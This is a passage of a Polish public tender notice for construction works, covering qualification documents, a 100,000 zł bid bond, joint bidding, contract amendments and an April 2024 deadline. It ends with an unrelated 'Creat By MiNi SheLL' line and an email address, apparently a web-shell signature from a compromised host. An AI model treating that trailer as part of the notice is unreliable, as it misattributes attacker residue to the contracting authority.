Dz. U. z 2017 r., poz. 2222 z poźn. zm.). Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach polegać na zdolnościach technicznych lub zawodowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.<br/>Wykonawca nie może wykazać spełnienia niniejszego warunku poprzez powołanie się na wykonanie tylko części robót budowlanych składających się na budowę obiektu kubaturowego.<br/>2.Oceniając zdolność techniczną lub zawodową, Zamawiający może, na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) na potwierdzenie spełniania warunku udziału w postępowaniu, o którym mowa w rozdziale VII ust. 1 lit. c) SWZ Zamawiający wymaga:<br/>złożenia przez Wykonawcę dokumentów potwierdzających, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia.<br/>2) na potwierdzenie spełniania warunku udziału w postępowaniu, o którym mowa w rozdziale VII ust. 1 lit. d) SWZ Zamawiający wymaga przedłożenia na zasadach określonych poniżej:<br/>wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w zakresie robót wskazanych w rozdziale VII ust. 1 lit. d) SWZ wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty.<br/>Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowalnych, wykonywanych wspólnie z innymi wykonawcami, wyżej wskazany wykaz dotyczy robót budowlanych, w których wykonaniu wykonawca ten bezpośrednio uczestniczył.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">w celu potwierdzenia braku<br/>podstaw wykluczenia wykonawcy z udziału w<br/>postępowaniu:<br/>a) informacji z Krajowego Rejestru Karnego w zakresie:<br/>- art. 108 ust. 1 pkt 1 i 2 uPzp,<br/>- art. 108 ust. 1 pkt 4 uPzp, dotyczącej orzeczenia zakazu ubiegania się o<br/>zamówienie publiczne tytułem środka karnego,<br/>sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem,<br/>b) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 uPzp, o braku<br/>przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów<br/>(Dz. U. z 2020 r. poz. 1076 i<br/>1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub<br/>wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub<br/>wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego<br/>wykonawcy należącego do tej samej grupy kapitałowej, według wzoru<br/>stanowiącego załącznik nr 5 do SWZ,<br/>c) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 uPzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, d) zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie określonym w rozdziale VI ust. 2 pkt 3 SWZ (art. 109 ust. 1 pkt 1 uPzp), wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem Zamawiający żąda złożenia<br/>dokumentów potwierdzających, że przed upływem terminu składania ofert<br/>wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub<br/>grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności,<br/>e) zaświadczenia albo innego dokumentu właściwej terenowej jednostki<br/>organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału<br/>regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie określonym w rozdziale VI ust. 2<br/>pkt 3 SWZ (art. 109 ust. 1 pkt 1 uPzp), wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem Zamawiający żąda złożenia dokumentów potwierdzających, że przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub<br/>zawarł wiążące porozumienie w sprawie spłat tych należności,<br/>f) oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o<br/>którym mowa w art. 125 ust. 1 uPzp, w zakresie podstaw wykluczenia z<br/>postępowania wskazanych przez zamawiającego, o których mowa w:<br/>- art. 108 ust. 1 pkt 3 uPzp,<br/>- art. 108 ust. 1 pkt 4 uPzp, dotyczących orzeczenia zakazu ubiegania się o<br/>zamówienie publiczne tytułem środka zapobiegawczego,<br/>- art. 108 ust. 1 pkt 5 uPzp, dotyczących zawarcia z innymi wykonawcami<br/>porozumienia mającego na celu zakłócenie konkurencji,<br/>- art. 108 ust. 1 pkt 6 uPzp,<br/>- art. 109 ust. 1 pkt 1 uPzp, odnośnie do naruszenia obowiązków dotyczących<br/>płatności podatków i opłat lokalnych, o których mowa w ustawie z dnia 12<br/>stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2019 r. poz. 1170),<br/>- art. 109 ust. 1 pkt 6 uPzp,<br/>- art. 7 ust. 1 u.sz.r.z.p.w.a.u.s.o.b.n.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Oświadczenie wstępnie potwierdzające spełnienie przez wykonawcę warunków udziału w postępowaniu oraz brak przesłanek do wykluczenia, o którym mowa w art. 125 ust. 1 uPzp zgodnie z załącznikiem nr 2 do SWZ, składane za pomocą środków komunikacji elektronicznej w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym na zasadach określonych w rozdziale XIII SWZ.<br/>2. Formularz ofertowy (stanowiący treść oferty), zgodnie z załącznikiem nr 1 do SWZ, składany za pomocą środków komunikacji elektronicznej w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym na zasadach określonych w rozdziale XIII SWZ.<br/>3. Jeżeli wykonawca polega na zdolnościach lub sytuacji innego podmiotu (zwany w niniejszym dokumencie jako: ,,podmiot udostępniający”) na zasadach określonych w art. 266 w zw. z art. 118 uPzp, w celu dysponowania niezbędnymi zasobami w stopniu umożliwiającym należyte wykonanie zamówienia publicznego Zamawiający wymaga<br/>przedłożenia:<br/>a) zobowiązania podmiotu udostępniającego, które będzie określało:<br/>- zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>- sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów<br/>podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>- czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego<br/>wykonawca polega w odniesieniu do warunków udziału w postępowaniu<br/>dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje<br/>roboty budowlane lub usługi, których wskazane zdolności dotyczą.<br/>b) w celu wykazania braku istnienia wobec podmiotu udostępniającego podstaw do<br/>wykluczenia, a także spełniania warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na zasoby<br/>podmiotu udostępniającego, wykonawca<br/>składa oświadczenie wstępne, o którym mowa w ust. 1 wypełnione przez podmiot udostępniający zgodnie ze wzorem, który stanowi załącznik nr 2a do SWZ.<br/>4. Dowód wniesienia wadium wykonawca wnosi w formie elektronicznej za pomocą środków komunikacji elektronicznej. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w art. 266 w zw. z art. 97 ust. 7 pkt 2-4, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>5. Pełnomocnictwo do reprezentowania Wykonawcy – w przypadku złożenia oferty przez pełnomocnika. Pełnomocnictwo musi zawierać w szczególności ustanowionego pełnomocnika oraz zakres jego umocowania.<br/>6. W przypadku wykonawców wspólnie ubiegających się o zamówienie oświadczenie, o którym mowa w ust. 9 pkt 2 niniejszego rozdziału. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.W niniejszym postępowaniu wymaga się wniesienia wadium w następującej wysokości 100 000 zł (słownie: sto tysięcy złotych 00/00).<br/>2.Wadium musi obejmować okres związania ofertą i być wniesione przed upływem terminu składania ofert.<br/>3.Wadium w formie dokumentu elektronicznego musi być przekazane do Zamawiającego tak aby skutecznie wpłynęło do terminu składania ofert oraz musi być sporządzone w jednym z formatów danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne.<br/>4.Zamawiający zaleca sporządzenie dokumentu elektronicznego wadium w postaci pliku pdf.<br/>5.Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>a) pieniądzu;<br/>b) gwarancjach bankowych;<br/>c) gwarancjach ubezpieczeniowych;<br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572).<br/>6.Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez Zamawiającego. Wpłaty wadium w formie pieniężnej należy dokonać przelewem na konto w banku: 05 1160 2202 0000 0002 5584 6944 z oznaczeniem „WADIUM – postępowanie w trybie podstawowym o nr PR/WT/01/2024”.<br/>7.Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>8.Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w ust. 5 lit. b-d, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>9.Gwarancja lub poręczenie musi zawierać w swojej treści nieodwołalne i bezwarunkowe zobowiązanie wystawcy dokumentu do zapłaty na rzecz Zamawiającego kwoty wadium. Wadium wniesione w formie gwarancji (bankowej czy ubezpieczeniowej) musi mieć taką samą płynność jak wadium wniesione w pieniądzu – dochodzenie roszczenia z tytułu wadium wniesionego w tej formie nie może być utrudnione. Dlatego w treści gwarancji powinna znaleźć się klauzula stanowiąca, iż wszystkie spory odnośnie gwarancji będą rozstrzygane zgodnie z prawem polskim i poddane jurysdykcji sądów polskich, chyba, że wynika to z przepisów prawa. Ponadto gwarancja powinna być nie odwoływalna oraz płatna na pierwsze żądanie.<br/>10.Oferta wykonawcy, która nie będzie zabezpieczona wadium zostanie odrzucona na podstawie art. 226 ust. 1 pkt 14 uPzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Oświadczenia i dokumenty Wykonawców występujących wspólnie:<br/>1) Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. W<br/>związku z tym należy wskazane pełnomocnictwo<br/>złożyć wraz z ofertą.<br/>2) W odniesieniu do warunku udziału w postepowaniu dotyczącego zdolności technicznej lub zawodowej wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane. W tym przypadku, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego<br/>wynika, które roboty budowalne wykonają poszczególni wykonawcy.<br/>3) Wykonawcy występujący wspólnie powinni złożyć oświadczenia i dokumenty, o których mowa w niniejszym rozdziale SWZ, z tym, że oświadczenie wstępne wymienione w ust. 1 niniejszego rozdziału SWZ (oświadczenie wg wzoru stanowiącego załącznik nr 2 do SWZ) oraz dokumenty wskazane w ust. 7 pkt 3 niniejszego rozdziału SWZ (dokumenty<br/>potwierdzające brak przesłanek do wykluczenia wykonawcy) składa każdy Wykonawca z osobna, natomiast pozostałe dokumenty lub oświadczenia potwierdzające spełnianie warunków udziału w postępowaniu określonych przez Zamawiającego mogą być składane wspólnie.<br/>4) Dokument o którym mowa w ust. 1 niniejszego rozdziału SWZ (oświadczenie wg wzoru stanowiącego załącznik nr 2 do SWZ) powinien potwierdzać spełnianie warunków udziału w postępowaniu w zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>5) Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Dopuszczalne zmiany postanowień zawartej Umowy oraz określenie warunków tych zmian:<br/>1. Zamawiający dopuszcza zmianę postanowień Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w razie wystąpienia następujących okoliczności, z uwzględnieniem podanych warunków ich wprowadzenia:<br/>a. zmiany numeru rachunku bankowego, nazwy i innych danych Stron umowy,<br/>w przypadku zmiany tych danych, <br/>b. zmiany cen jednostkowych lub wynagrodzenia wykonawcy na niższe niż<br/>zaoferowane,<br/>c. zmiany stawki podatku VAT – przez odpowiednią zmianę wynagrodzenia brutto <br/>Wykonawcy. Strony są zobowiązane do niezwłocznego zawarcia odpowiedniego<br/>aneksu w przypadku wystąpienia zmiany stawki podatku VAT. Zmiana nastąpi na podstawie wniosku strony. W przypadku wniosku Wykonawcy powinien on wskazać konkretną podstawę prawną zmiany stawki VAT oraz wyjaśnienia i uzasadnienie potwierdzające konieczność zmiany stawki VAT. Zamawiający ma prawo w tym przypadku żądać dodatkowych wyjaśnień,<br/>d. nastąpi zmiana wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę - Zamawiający dopuszcza możliwość wzrostu cen jednostkowych netto, wraz z konsekwencjami rachunkowymi, w przypadku zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę. Zmiana związana ze zmianą wysokości minimalnego wynagrodzenia za pracę może nastąpić nie wcześniej niż z dniem wejścia w życie aktu prawnego wprowadzającego zmianę wysokości wynagrodzenia minimalnego za pracę. Podstawą do dokonania zmiany w opisanym wyżej zakresie będzie pisemny wniosek Wykonawcy złożony Zamawiającemu,<br/>zawierający dokładny opis proponowanej zmiany, uzasadnienie wniosku wynikające<br/>z regulacji art. 436 pkt 4 uPzp oraz wykazanie wpływu proponowanej zmiany na koszty wykonania zamówienia przez Wykonawcę. Zamawiający uprawniony będzie do żądania od Wykonawcy wyjaśnień i dowodów na okoliczności zawarte przez niego we wniosku o zmianę (zdanie poprzedzające) w celu jednoznacznego<br/>rozstrzygnięcia spełnienia przesłanek opisanych w art. 436 pkt 4 uPzp;<br/>e. nastąpi zmiana zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu<br/>zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub<br/>zdrowotne - Zamawiający dopuszcza możliwość wzrostu cen jednostkowych netto,<br/>wraz z konsekwencjami rachunkowymi, w przypadku zmiany zasad podlegania<br/>ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości<br/>stawki składki na ubezpieczenia społeczne lub zdrowotne. Zmiana związana ze<br/>zmianą zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu<br/>zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub<br/>zdrowotne może nastąpić nie wcześniej niż z dniem wejścia w życie aktu prawnego<br/>wprowadzającego zmianę zasad podlegania ubezpieczeniom społecznym lub<br/>ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia<br/>społeczne lub zdrowotne. Podstawą do dokonania zmiany w opisanym wyżej<br/>zakresie będzie pisemny wniosek Wykonawcy złożony Zamawiającemu, zawierający<br/>dokładny opis proponowanej zmiany, uzasadnienie wniosku wynikające z regulacji<br/>art. 436 pkt 4 uPzp oraz wykazanie wpływu proponowanej zmiany na koszty<br/>wykonania zamówienia przez Wykonawcę. Zamawiający uprawniony będzie do<br/>żądania od Wykonawcy wyjaśnień i dowodów na okoliczności zawarte przez niego<br/>we wniosku o zmianę (zdanie poprzedzające) w celu jednoznacznego<br/>rozstrzygnięcia spełnienia przesłanek opisanych w art. 436 pkt 4 uPzp;<br/>Pozostałe postanowienia o zmianie treści wzoru umowy są zawarte w par. 16 wzoru umowy (załącznik nr 4 do SWZ). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-04-24 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-04-24 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com